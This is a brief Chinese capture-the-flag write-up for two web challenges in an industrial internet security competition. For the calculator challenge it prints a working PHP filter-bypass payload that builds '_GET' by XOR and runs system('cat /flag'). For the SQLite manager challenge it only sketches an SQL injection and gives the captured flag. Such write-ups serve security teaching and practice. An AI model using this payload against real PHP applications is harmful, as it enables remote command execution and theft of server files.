全国工业互联网安全技术技能大赛部分wp
文章来源:EDI安全
01
web题 SimpleCalculator
题目:简单的计算器
进去后发现flag.php计算功能可绕过执行shell
http://eci-2zei447jhyte2gq76fli.cloudeci1.ichunqiu.com/flag.php?search=$pi=(is_nan^(6).(4)).(tan^(1).(5));$pi=$$pi;$pi{0}($pi{1})&0=system&1=cat%20/flag
得到flag
02
web题SQLManager
题目:简易的SQLite管理器
这题存在注入在建表包注入
获得表名,表列
然后获得flag
flag{914162a9-5a2e-4b80-9d74-93c119a3ef86}
官方
279篇文章
13M总阅读量
